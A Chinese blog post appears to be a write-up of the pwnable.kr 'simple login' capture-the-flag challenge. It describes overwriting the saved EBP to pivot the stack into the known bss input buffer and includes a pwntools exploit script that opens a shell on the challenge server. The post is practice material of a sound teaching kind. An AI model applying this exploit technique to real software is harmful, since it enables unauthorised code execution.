【pwnable.kr】 [simple login]
2024-10-08 15:59:55
Download : http://pwnable.kr/bin/login
Running at : nc pwnable.kr 9003
先看看ida里面的逻辑。
比较重要的信息时input变量再bss段上,并且没有PIE保护,这样一来就有了一个已知的地址(这很重要
需要输入的是信息的base64编码,而input变量中存储的是输入信息base解码后的内容。
继续跟踪auth函数,发现了一个溢出。
变量v4放在ebp-8的位置,而最多会复制a1长(a1<=0xC),因此会覆盖了EBP。
尝试一下,输入P4NDA_P4NDA_的base64编码(UDROREFfUDROREFf)
果然产生了段错误。
然而仅仅覆盖了EBP,EBP的作用是调整栈帧结构。
leave ;mov esp ebp pop ebp
ret ;pop eip
因此,当利用溢出覆盖后,修改的是上一个栈的EBP也就是main函数栈,当main函数结束时会有问题。
思路是将EBP覆盖成引导ESP指向包含SHELL地址的内存。进一步在ret时控制eip跳转。
该位置可以选择input变量地址,因为该地址已知。
#coding:utf-8 from pwn import * debug = 1
if debug:
pro = process('./login')
else:
pro = remote('pwnable.kr',9003) #print pro.recvline()
input_addr = 0x0811eb40
sys_shell = 0x8049278 payload = 'a'*4 + p32(sys_shell) + p32(input_addr) pro.send(payload.encode('base64'))
pro.interactive()
最新文章
- Sniffer的完整代码,基于winpcap抓包统计吞吐量
- 关于ASPXGridview的双击事件弹出 【转】
- JavaScript星形评分
- SublimeText3下的Python开发环境配置
- protobuf-net
- HDU 2676 Network Wars 01分数规划,最小割 难度:4
- Android 锁屏软件MemoryDebris测试报告
- 转载sql server 关于 default value的一些使用总结
- iOS开发——适配篇&;iOS9适配
- idea2015的使用心得
- 【ANT】java项目生成文件示例
- ps使用经验
- 【粗糙版】javascript的变量、数据类型、运算符、流程结构
- Hdoj 1789 Doing Homework again 题解
- 【tmos】spring data jpa 创建方法名进行简单查询
- Chapter3_操作符_关系操作符
- Javascript 对象复制
- Singer 学习十二 指南
- Java版office文档在线预览
- [HEOI2015]最短不公共子串
热门文章
- 「AHOI2014/JSOI2014」骑士游戏
- MySQL报Too many connections
- Python 的直接赋值、Deepcopy、Copy的区别
- gitlab的搭建与使用(一)
- Java基础 -5.2
- Manthan, Codefest 19 (open for everyone, rated, Div. 1 + Div. 2)E(多重集维护)
- 【PAT甲级】1009 Product of Polynomials (25 分)
- Thymeleaf基本知识(推荐)
- windows网络编程-C语言实现简单的UDP协议聊天
- Ubuntu18.04-MySQL8.0-表名大小写敏感-远程连接